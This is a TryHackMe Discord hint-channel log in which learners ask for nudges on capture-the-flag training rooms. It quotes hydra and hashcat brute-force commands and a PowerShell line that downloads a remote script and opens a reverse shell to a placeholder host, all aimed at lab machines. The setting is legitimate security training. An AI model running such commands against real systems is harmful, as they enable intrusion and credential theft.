#room-hints
hi, anyone for the foothold on "SET" room?
hey, need hint for the task 43 : https://tryhackme.com/room/zthlinux
idk if i need to gain root access or if it's something else bcs i don't learn how to do it with root access
what have you tried till now @alpine lantern
hmm, tried to go into /etc/shadow but i need Root access too, tried to change permissions on the file but need root permissions, someone tell me i need to use the find command but idk how it can help me if i can't open the txt
look at all the files owned by all users, you'll find a file which you haven't used till now. you are currently logged in as user shiba4 and you don't have su permissions, so find the user which has those permissions
i have shiba1 to shiba4 for perm
he completed the find command room yesterday
ye ^^
x)
i saw a file got a shadow user
then you should know how to play with find command
ye sure
dig harder you'll find the answer
room: CC Pen Testing
last task: CTF
I found the hidden directory and the hint given in room tells me to enumerate the site with hidden directory with different extensions
I have tried html,txt,jpg,php with all 3 wordlists big,small,medium
I haven't got anything though any hint for it
Hello am stuck on the CherryBlossom room journal flag|| i have the png image already but when running the check_png.sh|| i find nothing pls what am i missing??
the note says when u find the script put your all input in quotes ,
any body know what does that mean i have the script
Crypto Funhouse room: task 2 question 4 ; please help me
#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:
- What room you are on
- At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
- What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done
https://tryhackme.com/room/owasptop10 I am really stuck here... can anyone help me?
like how do I get to the root directory
I can connect there through putty, but I don't have the password...
I don't know how to get it
oh maybe I know
oh no I don't
oh
well Task 6 Day 1
I sent the link
I tried all the commands to try it said
oh I found the file
the text one
You don't need a password to connect, this web server has a command injection vuln. You can get a shell by making it execute a command directly
yeah but I forgot some of the commands
Pentestmonkey reverse shell may be a good resource for this case then
any hints for root privesc on Wonderland
i am on hatter's ssh box and i have tried linpeas and searched a lot but not able to figure out any attacks for root privesc
@ripe hedge not getting any clue on what to look for ... P.S. looked a lot
You don't need a clue what to look for
You just need to run some enum scripts
See what it picks up
Linpeas usually highlights interesting things
Run it on a standard Ubuntu install, compare and contrast
That helps as well
thanks i got it
i never gave any thought to that section of linpeas before
Also i learned at each step in this box
That was the goal when I built it
Please don't show passwords like that
- What room you are on: Learn linux
- At what stage are you stuck exactly? Task43. I cant authenticate to the nootnoot user
Then maybe you're typing the password wrong
im not man, like im trying
I mean, if you're typing the password correctly and it's not letting you, then the password is wrong
But I bet you're typing it wrong
not really looking for a hint but recently i signed up for the complete beginner learning path. i completed the linux basics and linux challenge rooms and next up was tmux. in the tmux room it asked to run an nmap scan against the VM, but as i stated i'm a complete beginner and have never used nmap should i do the nmap room before the tmux room? thanks!
Room: Crack the hash
Hash:279412f945939ba78ce0758d3fd83daa
Format: MD4
Status...........: Exhausted
I think that means none of the words matched the hash.
could you give me a hint?
You don't necessarily have to if it tells you exactly what nmap command to run
nmap is fairly straightforward, but it doesn't hurt to be familiar with it as one of the first things to learn
Sure, tmux is just a utility thing for multi-tasking
so nmap and tmux aren't very related at all
ok thanks that's good to know
Room: Crack the hash
Hash:279412f945939ba78ce0758d3fd83daa
Format: MD4
Status...........: Exhausted
I think that means none of the words matched the hash. could you give me a hint?
$ hashcat "279412f945939ba78ce0758d3fd83daa" /usr/share/wordlists/rockyou.txt -m 900
Why not try online crackers?
It's md4 without a salt
perfect for online rainbow tables
is it a lot faster?
I mean, it's literally just a lookup rather than manually testing each input word
So, yes. Massively.
why do I even bother learning hashcat then
because online rainbow tables only work for unsalted hashes
And only works if the plaintext is in the wordlist they used to create the table (which tends to be bigger lists than rockyou, and they add to them when they want)
I'll have to look up unsalted hashes. you just made it clear that I know nothing about hashes
Salts are a thing you add to the plaintext before hashing it
So that 2 users with the same password wouldn't have the same hash
sha512crypt, bcrypt, a few more, use a salt by default
So you can't use online rainbow tables (or any rainbow tables) to crack them
The salt is stored in the database
There's a room on this
hi all i have few que related to owasp day 9 task 30 component with known vulnerability like i have completed the task somehow by following the instruction but what i did was quite unclear as i was doing that for the first time i also google a bit but didn't get the satisfied ans.
I don't actually see what your question is.
i am writing a min!
as que says there is web app with vuln. and i can found with help of google i did now it say after getting the script i have to put quotes in input i didn't get that so i run the script without any changes it didn't work first few time becuz i was not sure with syntax in task 29 there was a example how to run the script :: python <scriptname><target ip><port_num>. but that didn't work it showed error then i tried few time without port no i suddenly i got the shell now after that i was not able to even change dir. i don't know i type cd .. or cd <location> but it didn't work but when i type the syntax given in que that gave me some output the syntax was: wc -c <location> i didn't understand how that work
Some shells don't let you change directory, or don't preserve the new directory
Sounds like you need to read the manual for wc
wc is used for count right
You need to do your own research
gotcha
before asking
also why did i not get shell while i run the cmd for the first time
because you did something wrong? IDK, you haven't provided screenshots or anywhere near enough information for anyone to answer that question
well i already done that part but i was curious how i did that that way i don't have any screenshot though thx for time and advice
also the que say to give quotes to input in scripts any idea about that
around commands, like it tells you
i have a screenshot of script can i share here?
It's not actually relevant to share
You don't do anything to the script
It says all of your input in quotes
yes input means what it try to refer i didn't get that like we can not add to the input which call the value we can only quote which we want to print right so i got confused
Whatever you just said, it's incredibly unclear
sorry for that
Hi
Im rn in the last task of x86 64
And in the hint it says to reverse the password
I was just wondering where u could find that part while analysing the binary
"Reversing" is just a function/set of instructions designed to repeat until finished
Find out where the "processing" is done, the keyword is "loops"
The doubt i have is related to spoilers
Can i pm you?
I got the answer but i got it through hints
Hello, i need help in the Linux walk through room, task 18 question 2, it says what is the value of the home environment variable I tried doing echo $home but it doesnt return anything. What could be the problem? Thanks
Variables are case sensitive
oh, thanks man
Hi guys. I am sitting here in the https://tryhackme.com/room/linuxctf and trying to find Flag 15. (Can you find information about the system, such as the kernel version etc.) - Unfortunately i still cannot find this info after 30 minutes of research. I tried hostnamectl values, did not work. uname with all parameters etc. I also checked the /procs/ directory. Not no chance. Thank you for any tips
The hint tells you where to look
something with ||*release|| But i cannot find it. I checked all files with ||release|| in the name and did a system wide search.
mmh ok. then i need to look closer. damn it
but i will do this tomorrow. time to go to bed now.
good night!
hello guys, I need help in the linux walkthrough room, task 33, I dont know how to find the shiba4 binary, i did this find / shiba4 and find / shiba4.bin but they didnt work. what could be the problem? thanks
I recommend going back and learning how find works
ok, thanks
yeah but it seemed to be working
You're missing something essential in your command.
Clearly it wasn't working
yeah
Vulnversity room Task 3 #2, I think i'm approaching with a wrong method by blindly choosing a random file for goBuster. I would like to get a hint on what im doing
How about using a directory wordlist?
@stuck fractal the command only works with file but not with directory
||gobuster dir -u http://<IP>:3333 -w /usr/share/wordlists/<file of choice> ||
Hello guys. Anyone give me a hint on django room. Last task. I managed to find the hidden flag but I'm really struggling to get the user and panel admin
Yep, that's correct @nimble swift
@stuck fractal but my problem is I don't think the file I'm supposed to use is in there
Are you on Kali?
You need to go deeper into gobuster wordlists directory and then choose a file
@stuck fractal yup
Or dirsearch wordlists. Or any of those wordlists directories
@nimble swift Then there are a lot of directory searching wordlists in /usr/share/wordlists
They're organised into dirs within that dir
@oblique cliff look like I have to look into each file, right?
I leave you in James's more than capable hands
@stuck fractal sorry cannot see bruteforcing wordlist in /wordlists
No, you can't. Because it's not called that.
Have you tried researching the names of the files and folders you find there?
Find out what their purposes are
I see, I am going to have a look into these directories first
The names of the directories probably mean more than the names of the files inside them
@stuck fractal I found the directory that contains lists of directories ||dirbuster|| but it's incorrect
Room: Vulnversity, Task3 #2.
My question is about the file I chose for gobuster is not the right one
I am using the given command for gobuster but I have to give it a file
Yes
What is the problem?
What's telling you that the file is not the right file?
no result from files I used
What files did you use?
||fasttrack.txt||
atm im running ||"rockyou.txt"|| but it will take a few hour
inside "dirbuster" there are many files for directories
yup
dirb has small ones
@stuck fractal This is very cool, after I got my results from gobuster I use them on firefox to check for "upload form page"
What can we load into Comparer to see differences in what various user roles can access? This is very useful to check for access control issues Can Anyone help me in this question?
hi I m doing some basic room just as morning warmup, i m stuck on question about nmap. I can't find correct answer (I mean I know the correct parameter but it said I m wrong) may be because my english is not good enough. Any one to give a push?
Maybe you can mention what question is that and what do you think the answer is
@final mortar the question is "how do you do a "ping scan"". to me it is -sP but it says no
Its not that. Look at the manual again.
@ashen matrix thank you got it.
I really need help with this one in CC Pen testing, Nikto. I have been looking through many manuals and keep returning back to -mutate+3 which is not the right answer.
It's only looking for the name of the plugin not the command
On here it will state Plugin: Plugin_Name
Ok thanks, I'll try to see if I can find the name of the plugin
Task 2 #3
```
Hash:$6$aReallyHardSalt$6WKUTqzq.UQQmrm0p/T7MPpMbGNnzXPMAXi4bJMl9be.cfi3/qxIf.hsGpS41BqMhSrHVXgMpdjS6xeKZAs02.
Salt: aReallyHardSalt
Rounds: 5
```
I used online hash analyzer for previous levels. I don't know how to go with this. I tried analyzing the hash without the salt and it is unknown either way.
Online hash analysers can't crack hashes which contain salt
You need to use hashcat for it
I just want to know what hash algorithm is used so that I can set mode for hashcat
Google it
Google on how hash structure is classified
You'll find out how to identify hash type
thanks
Hashcat has a website for example hashes
Hey @trim haven this search query won't give the answer
Keyword examples
I know how I found out that answer but what will be general search query for it
I completed the exact room by looking at examples and seeing which ones matched the current hash
For some reason I just googled what is ||$6$|| hash type
And then somewhere I got the structure of the hash
Hi, please give me hint about room 'Recovery', i am in the start
I'm in the basic pentesting room and running: hydra -l jan -P /usr/share/wordlists/rockyou.txt 10.10.136.178 -t 4 ssh
but it takes forever.
I get 44 tries in 1 min
-t 4 might take a while with rockyou
You can safely use 16 threads on that room
You can probably get away with more but it might also break the server
Im running it on the browser based kali machine. I can just find the info 3Ghz intel. But how many threads does it have?
As many as you want? As for cores that's a good question
sorry I mean cores.
Doesn't really matter for threads
@alpine remnant Doesn't matter
Threads != processes
Can I has nudge on Wonderland from Alice :(
looked very carefully through all the enumeration scripts and did manual enumeration but I haven't been able to find anything I can take advantage of
||the python file that we can run as hatter is uneditable and I can't delete it and write over it, and then the 2 things with capabilities set only can be run by hatter, which I am not||
The python file isn't editable but it does something interesting
blargh ok i guess i just skimmed what it does, ill look closer
Okay, got it. I was just a little confused if -t is refering to the physical core count or threads.
On the server, silly
cool, thanks
There's also another part to that puzzle
oh nos
You should have found it while enumerating, otherwise enumerate harder
@ripe hedge Really?
i mean i found a lot of stuffs, but im not sure to which stuffs youre referring
Let me check my notes it's been a while
@oblique cliff sudo -l
unless theres some way to pipe an extra command into that sudo entry (which I don't know how to do if so), or something in the secure path that i dont know about either I don't really see how that helps
||all the file does is choose 10 random entries from the list, running it as rabbit doesnt make a difference that i can see||
Hello, i am having issues with find agent name in task 2 #3 room agent sudo
*finding
@hushed elbow tell me any agent name you found ?
haven't found a way to find it, but i used the hint to change the UA to chrome
who told you to change UA, exactly ?
from the hint section, i was told to change it
hint is correct but you got it wrong, ||playing with words||, you tried opening webpage?
plus take @stuck fractal's advice. combine hint you shared with the msg with the one on webpage (msg by another agent).
Thanks, was able to get it
I haven't tried anything else so I'm not looking for a hint, but just out of curiosity @stuck fractal why ||if that tea party binary is setting its id to hatter, when I overflow the input why do my commands still execute as rabbit||?
Lmao
Don't laugh at me
I did
I thought I could overflow the char function, guess not
The teaparty binary was pretty fun
@regal oriole Wrong channel
Sorry
So not a rabbit hole, noted when I boot back up
hi i have issue in linux room task 11
any hints on Recovery
hi i have in linux room task 11
@tribal surge Please give more detail if you'd like help or a hint
@tribal surge screenshot of that task will be helpful, maybe with some context
And some basic details of your issue
Seeing as we can't help if we don't know what's wrong
The teaparty binary was pretty fun
@tidal sedge I overestimated it so much and then realized how simple the concept was
That was the goal
Aaaaaand I stop reading now
my question is where should i create the file
In the directory you're in currently
Hmm, I remember RE'ing it when the box dropped, fun times, once you know what to do on wonderland it's pretty simple, but still fun
I mean I would argue most boxes are pretty simple after you've completed it
Hi, please give me hint about room 'Recovery', i am first flag
At the start is vague
I've tried all my knowledge, the start means first flag
I've tried all my knowledge well that really tells us nothing
)
What exactly have you tried?
You should ask your exact problem tbh
Ssh brute, gobuster, port knocking, searching for exploit To Apache,
They give you ssh creds
Yeah
What are you bruteforcing?
There is another port with ssh and another user
What other user? And how do you know the other user
By the description
Have you tried ssh with given creds?
the theme of the room is reversing the damage that the malware has done
so start by trying to see what the malware did
I can't explain that is not normal CTF
Wut
didnt understand what you said there
You can't just throw anything there, you gotta understand whats happening
Nudge for ||teaparty|| in wonderland? I ||REd|| it but i cant see anything thats exploitable
||the date...?||
Try it and see™
i can't change ||date|| without sudo privs
@oblique cliff Go do kenobi
NOOOOOOOOOOOOOOOOOOOOOOOOOOOOO
noooooooooooooooooooooooooooooooooooooooooooooooooooooo
thank you, so sad
Or commonlinuxprivesc
yes yes i understand already
the nooooooo was cuz i cant believe i didnt notice that
does powershell run with the same permissions as CMD right, they are based both on the user perms?
(I googled and didnt find anything conclusive btw, just confirming)
@white salmon
yes
I assume its intended that I dont end up in ||hatter|| group when i exploit ||teaparty||?
or did i fork that part up
@oblique cliff ||you get given the password so you can use su or ssh||
aw man, again think harder jared!!
thanks buddy
hello quick question; first day using site and im doing the research room right now and im just stuck on the last question about "If a password hash starts with $6$, what format is it (Unix variant)?" im missing something cause I found out that its something called Bcrypt and it uses SHA-512 hash but thats not the answer its looking for so im a bit lost now
its looking for something a bit more specific than that, but youre on the right path
or rather, you're right, you just need to get the naming convention right @hidden flax
to make my response clearer
ahhh dang
you're close but that's not quite the answer
haha
i'm in the common privesc room and i'm supposed to use msfvenom to make a payload for a cron exploit. when i try to run the code it says msfvenom command not found
did you try googling the exact question?
type it in again on google and see if you can find it
@hollow widget are you calling that command on your attacker machine or target
@hollow widget Run msfvenom on your host machine
@stuck fractal well, you have successfully driven me bonkers with this room, so good job. Fun now that its done
The sequel is worse
yea, ill do that one next decade
It'll be out pretty soon
and ill laugh as people come in here asking questions that i cant answer
@stuck fractal I assume that's the ports one?
I take the 5th
ah im still not able to find it ; the hint says __cry all im seeing is how AES uses it and that it was created by NSA in 01 any other hints as far as what i can search ?
i know i cant find anything about what SHA-512 is aside from it being from sha-2
im just lost
ill figure it out eventually
@hidden flax It's not sha512 though
Sha512 doesn't include a salt and doesn't have a prefix
it's related
okay so thats not even in the right direction then ? ill move past it
It's related to sha512
But sha512 doesn't have a prefix
And doesn't include a salt
Hey guys, when I try gobuster it says unable to connect, to <ip> request canceled while waiting for connection
first time i did it it did work tho
Bad VPN
I need help with agent sudo room
I got into ftp server
and there is this file telling me
All these alien like photos are fake! Agent R stored the real picture inside your directory. Your login password is somehow stored in the fake picture. It shouldn't be a problem for you. There are 2 image files, I dumped both of the files and couldn't find anything
Stegggggg
thank you guys
@stuck fractal how do I fix the bad vpn? I tried reconnecting etc
sorry i'm new to all this
#site-support follow the VPN troubleshooting script
Thankyou
Any tips on vulnversity: compromise the webserver exercise 1? Whenever I try to upload something it says extension is not allowed, but it's the wrong answer
There's a specific kind of extension allowed- it's specifically one that enables you to use a reverse shell
see if you can find out which extension is useful for reverse shells
is there like a tool for it?
@humble badger Yes, it walks you through that
^
But if you're really curious, https://www.acunetix.com/blog/web-security-zone/what-is-reverse-shell/
idk if this will answer your question necessarily, but it might point you in the right direction
Thanks guys
Have people used this exploit https://www.exploit-db.com/exploits/39161 in the "steel mountain room" ? After correcting some python errors and executing it the exploit gets blocked in the first request, without even making a request to the local web server... result:"curl: (28) Failed to connect to 10.10.169.149 port 8080: Connection timed out"
ps: the exploit is mentioned in task 4
the ip's and ports are all right
I also tested my web server and worked, weird
nevermind, redeployed and it works.
hello, I need help in the linux walkthrough room, the last task (43) and basically, it asks us to find the flag in the file /root/root.txt, i have tried nano, cat, chmod, chown, grep, i have tried switching users, i tried viewing the password for shiba3, but it is the only one that has permission denied. What could I be doing wrong? Thanks
You'll have to find somebody who does have access to /root/root.txt
Are you sure you've checked every user?
I tried it with shiba1, shiba2, shiba4 and noot. However I cannot find the passwords to shiba3 or nootnoot
Maybe those are the clues then :)
yeah
Don't just give up because you can't take the most direct path to root
will i have to login to another account to get to root or no?
anyone that can DM me for help on recovery? i got first 2 flags ..... had some questions.
That's what you'll have to find out
okay
hey man, i still didnt figure it out. I navigated basically everywhere in the computer trying to find clues, but i cant find anything
Check the files owned by each user, one should stand out @terse kiln
@oblique cliff Ok, thanks
@oblique cliff I checked the files owned by each user by doing find / -user USERNAME. but i didnt find anything, there were too many files and it was hard to find an important one
Did you filter out the errors
no
Google how to throw the errors into the abyss
ok, thanks
@graceful sun I'm working through it, still missing a couple but I'm happy to help if I can.
room haskell, getting myhusk: Network.Socket.connect: <socket: 3>: does not exist (Connection refused) on reverse shell, any idea ?
task 22 day 17
first question, In hint it is given that password should be cracked within 30 passwords in rockyou.txt. I have tried to login using molly, Molly, mOlly and few more but I'm not getting the password am I doing something wrong?
Hey in break the cage room || decoded dad_tasks to base 64 but can't decode|| it further stuck there also found this || audio file .MP3 that I think has something hidden || but can't find any tools to extract msg from ||.MP3 file||
https://tryhackme.com/room/ccstego check this room for finding that tool
I don't think though that you can extract the data from .mp3 file using the tool given in this room
google on it
Yea even I couldn't find much on mp3 file there was info on .wav files only mostly...
Thanks though :)
task 22 day 17 first question, In hint it is given that password should be cracked within 30 passwords in rockyou.txt. I have tried to login using molly, Molly, mOlly and few more but I'm not getting the password am I doing something wrong?
?? any hint for this
Haven't done that yet...
Looks like there must be other usernames that you should try
Just guessing...
yeah I'll look into that
@arctic crystal if you don't get anywhere you should move to #room-help and post a screenshot of the command you are trying there.
I haven't checked writeups yet, So I didn't move to #room-help
My guess is that you don't have your hydra syntax 100% correct.
this is what I used ||hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.149.211 http-post-form "/login:username=^USER^&password=^PASS^&Login=Login:Your username or password is incorrect."||
The page is just /login?
Shouldn't be .PHP or some extension...
Rest looks fine according to me...
just login
Read the write up
ya I was going to that now
It will work eventually.
WTF that hint is totally misleading
it worked for me in less than a second
The syntax seems fine haven't done that part though...
you mean ssh password or web-server password
@mossy obsidian
can you share what you used exactly
Maybe issue with your VPN...
@eternal brook No I checked the writeup, The hint given in room is there to troll us
@native kelp I'm sure he appreciates it, but it would be better in #522158404614225920
everything is right but password gets cracked at around 900k+
You've got i
@arctic crystal you've got it now?
I swear to god, i did that room too
ya I got but still can you share what you used because even writeups say that it would take too long to crack the password how you got it in seconds?
@mossy obsidian
MY PC went brrr
The hint was " not to use hints again ever"
Don't do that lol. Keep that password like in first 200 words of rockyou
@eternal brook Seriously dude
mine was ex
@arctic crystal Mine was exactly the same as yours except using an environment variable for the IP. Have you performed a sort on the rockyou.txt file in the past?
@native kelp Ya that's a good idea
No
strange, the only reason I can think of that you didn't hit it quicker is that your wordlist is in a different order
ya that's how dictionary attacks work
Hey in break the cage room || decoded dad_tasks to base 64 but can't decode|| it further stuck there also found this || audio file .MP3 that I think has something hidden || but can't find any tools to extract msg from ||.MP3 file||
@eternal brook anyone?
Hint: spectrograph
Ok thanks:)
Is there some problem with the reverse shell I get as cage in break the cage room?
Sometimes it's sometimes it just hangs I've already rebooted the machine twice...
Hmm
I'm not aware of any issues like that
But as you're unsubscribed it's highly likely that that's just the machine being slow, have you tried running the VPN script to see if it's your VPN?
!vpnscript
Yea maybe subscription issue cause I get my shell back and then it dies or works for sometime then it dies...
I'm not sure about it constantly dying
I didn't have that issue when I wasn't subscribed and did the room
I'll redeploy then probably again ...
Hey i wanted a hint for the recovery room ... Im at the last flag but im not able to get the flag.... Any one who can help???
Specify "the last bit" please
@trim haven @eternal brook I didn't have any issues with that room and haven't seen anyone else with any issues
Mhm which is why it is strange
I'm 90% sure that shells dying is multivpn but don't quote me
@trim haven i have decrypted the files Using the key and uploaded back to the machine but i haven't received any flag after that...
Guys my Hydra is very slow, to crack password i need to go through 905678 passwords and on the hint in the room it says that it only should take about 30 seconds, but in 30 seconds my Hydra checks only around 3000 passwords and to check all of 905678 I need a lot of time (I know that password is on the 905678 position because I checked answers to that room). I am using VMware workstation with Kali on it and my Hydra is very slow is it supposed to be that slow? and how to boost it up?
I believe there are flags
But honestly if your computer is already slow I wouldn't want to push it too far
@livid elk which room?
Give it 10 minutes max, if not then we will have to help you further
Advent of Cyber Task 22 Day 17
@trim haven thanks
But you can use sed to specify which part of rockyou you want to start from
Let me check with Muir two seconds
Ow i didn't even think that they can troll in hints
password gets cracked at around 900k+ attempt
Ok thanks
@livid elk we don't. That was put very poorly
you can check writeups for that password or you can wait till it reaches 900k
@livid elk What are you trying to brute force exactly?
Bee and Muir said the room is broken and you will have to brute force ssh.
there are two questions for that task one is to brute force web-server password and other one is to brute force ssh password
ssh gets cracked within seconds
but web-server passwords takes a lonnnnng time
also when I discussed this here few hours back one of the user cracked the password but his password was different than mine and he was able to login using that password while I wasn't able to login using that same password
Ok guys next question: do you know like how to like check if the login u are using to bruteforce ssh or web server is valid or not?
depends on the software
some websites/services react differently to invalid passwords and invalid usernames
some ssh versions took more time to respond when the username was valid and you could check it that way
so there is no some program to check for valid logins for ssh or web server?
for some ssh versions there are scripts on exploitdb but websites are determined on a case by case basis
Ok thanks mate
@oblique cliff don't know why my VPN is fine still I re downloaded it redeployed the machine but my shell just keeps on dying (I'm talking about the reverse shell as cage )... I'll try again tomorrow...
Might be setting the wrong payload or something, not sure
Can anybody tell what is the name of address type reserved for router?
Do not ask in multiple channels. You got answered in the other 2 channels
@oblique cliff sorry
ultratech: i am bruteforcing auth api with 3 users, m i on correct way ?
done
ultratech foothold ?
ok @stuck fractal can u give me a hint in here?
No.
sorry for mention
ok anyway i have problem with admin authid in advent-of-cyber task 23 i dont know how to get admin cookie value
just ask for everybody and someone may answer you
@lucid crescent Read the task. Read the supporting material. Learn how it works. That's my hint.
task 2 Q2
webpage says change: `Use your own codename as user-agent to access the site.` I'm not getting what I'm supposed to do
any hint?
@arctic crystal Do you know what a useragent is?
the browser which access the web page?
No.
User-Agent also look for write ups @arctic crystal
This is the hints channel
LOL
You do not suggest writeups here.
I would have gone to #room-help
i said it like u @stuck fractal
if I would I checked writeups
So I recommend looking into what a user agent string is, and how you can set it
ok thx
also another hint use ||burp|| @arctic crystal
ok I have added new preference name and added the user agent
but still what is my codename like for Agent sudo will it be ||Agent S||
the message isnt for you
you need to guess the agent name that the message was intended for
ok
||another hint the User-Agent is one character|| @arctic crystal
Am I supposed to try all alphabets except R and S coz they are not working?
i mean there are only 26 letters in the english alphabet
wouldnt be too much to brute force it
ya but am I supposed to do that or am I missing something
like is that the intended way of doing it
well got it Thanks a lot
ok now I have extracted data from image and I have got one zip file and few other files I used zip2john on zip file and I got some hashed password but I'm not understanding exactly where it starts from
Where the hash starts from ?
Hello. I'm doing Wonderland. Need small hint with privesc ||from hatter to root. I've found that I can control date binary via PATH variable, but can't spawn shell as root. Only as hatter. So as there is already "S" bit set, I thought I can just run "/bin/sudo ./teaParty". No luck. But I've found that teaParty changes uid and guid at the start of the file. There is no way to change user's id or edit teaParty file. I have hatter's password, but he is not in the sudoers file. I think I don't understand something about "s" bit. Any hint, @stuck fractal ?||
@lean vector Please don't just tag me when you want a hint.
Enumerate harder
If you had sudo permissions, you would know.
Okay, there is no way ||to exploit CVE-2016-1238||
Enumerate.
Question on the intro to python Room: for decrypting the flag. I am reading the encoded flag into a variable then passing to functions to go through a loop five times first for base64.b64decode() then .b32decode and finally .b16decode. however all I get when I try to print out the decode string is b". I am taking it, it is not as simple running through a loop 5 times for each decode?
Outermost layer is base16
I'm doing HackPark right now, and I'm trying to brute force the log in with Hydra, but I get 16 passwords all of which say are valid, none of which work
That means your command is not correct
I personally recommend using OWASP zap as it's much better than Hydra for this
The correct command for hydra is quite complicated as you need the full body of the request as you captured it
I feel like my command is correct || hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.16.214 http-post-form "/Account/login.aspx:
__VIEWSTATE=4l%2FANhI6xhT2FagRv0tZtxmMNoR7auDmgGgiaxCqZDiv3khduBWG%2B0J1ETngEwkGtsks%2FOfCvo7w8R%2B1fDvqr9A2MC20%2FtnG9JbAUK91bDwpjXPkQ7qI96zGa22XPNLoU0uwNUWhSdELw6zJ5H84W0lTSPnbrpz3qdCGyO3vM0cBVbi3&__EVENTVALIDATION=Ds5wO5zCeTLNY0f3OCLlLsr0f9dbGxz6weYQJwVxY4dP9Yply4Oy7h9uDbjCWzvujXrygH2VodxbhNBABSjJSPOn%2F6FoMWwIHnAna7WKBp0daMvTaGnh2M5yPh7FbFK%2FauYcusEQqqgiC0Qkv54iyWPCHtLokEaQUHWUW%2BGGHFyAYhO3&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed"||
But I'll give zap a try
Thanks NinjaJc01 once I reversed the order worked perfectly
hi all , in need of a hint for ctf100 flag75 .. I need the level3 passwd.. clue is "search the file"... file in level2 directory is "nothing" and appears to be only ascii
it might be that you have to skip that one and come back to it as root
there was one that was like that for me if i recall
Anyone who can speak in private about Alfred? Just to avoid some info leaks xd
You can ask here and someone who can assist you will
Mark as spoilers and there's no problems
ok
ALFRED SPOILER: ||so when I write the command to run the reverse-shell "powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port" and I start "python -m SimpleHTTPServer" and "nc -lvnp [port]" I just get a
GET /Invoke-PowerShellTcp.ps1 HTTP/1.1
Host: IP:PORT
Connection: Keep-Alive
from netcat. The python HTTP server gets a 200 code but then a 400:
[08/Aug/2020 20:49:28] "GET /Invoke-PowerShellTcp.ps1 HTTP/1.1" 200 -
[08/Aug/2020 20:49:30] code 400, message Bad request syntax ('Windows PowerShell running as user bruce on ALFRED')
[08/Aug/2020 20:49:30] "Windows PowerShell running as user bruce on ALFRED" 400 -
|| I am doing something wrong, but I do not know what it could be. So any hints or tips are wonderful. Thanks.
Can you do a screenshot instead of copy pasta please
wait a minute
Waiting
To me, looks like the reverse shell from invoke powershell is going to your webserver
Whereas it needs to go to your netcat listener
That bit is fine
[08/Aug/2020 20:49:30] "Windows PowerShell running as user bruce on ALFRED" 400 -
That line is what suggests that to me
Wait
Now it looks like you've got them mixed up the other way
You got the GET request in your Netcat listener
'http://your-ip/:your-port needs to be your webserver
-IPAddress your-ip -Port your-port needs to be your netcat listener
damn... hahaha, let me try again with it
Can't use the same port for both
that was the error. Thanks a lot, I'm in now
@oblique cliff Sorry
No worries I'm on my phone it's hard to see lots of stuff like that on here
Hello guys, currently doing the vulnversity room, I am now in the last part where i need to|| exploit to root through systemd but I have no clue how to do this ^^"|| Any help?
Hello
@indigo holly I'd recommend doing some googling, you'll find resources that way
I am at a question, that asks for 'is hidden inside a system mount' - I dont understand that question: "Flag 16 lies within another system mount." of linuxctf
Try to research where external drives and/or usbs are mounted on Linux @clear quail
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 8.74 seconds
what should i do
What room is this?
idk
Could you show me the full nmap command that you are using please?
can you help me?, i'm trying to scanning my machine
What machine, sorry?
nmap -sC 10.10.192.122
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-09 04:29 SE Asia Standard Time
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 8.74 seconds
Use nmap -sC -Pn 10.10.192.122
it works but it won't show the ports
SYN Stealth Scan Timing: About 12.55% done; ETC: 04:49 (0:03:01 remaining)
Stats: 0:01:25 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 36.50% done; ETC: 04:49 (0:02:09 remaining)
only like this
That might be your command
what should i do
But wait for the SYN Stealth Scan to finish first
Nmap scan report for 10.10.192.122 (10.10.192.122)
Host is up.
All 1000 scanned ports on 10.10.192.122 (10.10.192.122) are filtered
Nmap done: 1 IP address (1 host up) scanned in 213.30 seconds
just like this
What room is this?
hints
Sorry?
What room are you on on TryHackMe?
On the tryhackme website, what room are you trying to do?
Nmap
Link please
Connect to the VPN.
but my cmd is sucks
Using this should help you :)
i'm connected
!vpn
Room: Madness
I got the file from the image and I got the password in it but I don't know username and room says that we don't have to ssh into the machine.
I'm not understanding what should I do, Any hint?
@hollow moon Can you type ps aux | grep openvpn and screenshot the output please
okay hold on
also no hidden directory found
If you're on linux*
Oh
yeap
Let me check the command one second
Windows + VPN + Nmap doesn't work sometimes
room says that we don't have to ssh into the machine. @arctic crystal Where does it say that?
@trim haven sure
Please note this challenge does not require SSH brute forcing. that's different to don't use ssh
sorry it says we don't have to brute force into it
only two ports found but all ports scan is ongoing
@hollow moon Can you press the windows key and type powershell, then select Windows Powershell and enter Get-Process openvpn and tell me the output
completed only two ports are open
hi, for Simple CTF #2 What is running on the higher port? I did allports but still can't find this? There's only 3 ports open and none of them is the right answer.
Don't screenshot because I don't know what might popup and I want to be on the safeside
you know what, ignore my question
@trim haven It should be impossible to have multiple VPNs on windows. Unless they are connected from 2 different devices.
i got it lol
I want them to get the process to see if they get an error
If there's an error they're not connected
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
112 10 2364 7744 1644 2 openvpn
@trim haven
nmap -sC -p- 10.10.192.122
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-09 05:04 SE Asia Standard Time
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 8.21 seconds
@trim haven
Okay try this (Sorry it's trial and error, I have not really come across this issue myself)
Try this one maybe: nmap -sC -Pn -p- <Machine IP>
thats fine bruh
You are not properly connected to the VPN
It scans fine from here
Please connect to the VPN properly
i'm connected
You are not connected properly.
Sometimes it may say you are but you aren't, it's an issue with openvpn/access page.
Try closing OpenVPN and re-opening it.
Then re-connect to the VPN.
it keeps disconnecting if you are using it on windows
If that doesn't work, please go to <tryhackme.com/access> and regenerate & redownload your configuration file.
